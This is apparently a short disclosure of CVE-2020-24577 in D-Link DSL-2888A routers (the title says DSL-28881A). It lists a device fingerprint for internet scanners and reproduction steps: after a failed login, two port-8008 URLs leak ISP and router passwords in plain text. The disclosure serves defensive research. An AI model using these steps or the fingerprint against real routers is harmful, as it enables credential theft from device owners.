D Link Dsl 28881a Information Leakage Cve 2020 24577
D Link Dsl 28881a Information Leakage Cve 2020 24577
D-Link DSL-28881A Information Leakage CVE-2020-24577
Vulnerability Description
After establishing a connection to the network through physical connection or wireless access, malicious users can directly browse the following URL to obtain the Internet provider connection username and password in plain text format, as well as the wireless router’s plain text format username and password by browsing the following URL directly
Vulnerability Impact
D-Link DSL-2888A
Network surveying and mapping
body=”DSL-2888A”
Vulnerability reappears
Enter any password to establish a connection on the login page
Jump to https://xxx.xxx.xxx.xxx/page/login/login.html?error=fail Display password error
Access the following two connections
1
2
https://xxx.xxx.xxx.xxx:8008/tmp/cfg/lib_cfg_cfgcmd
https://xxx.xxx.xxx.xxx:8008/tmp/.nvram
This post is licensed under CC BY 4.0 by the author.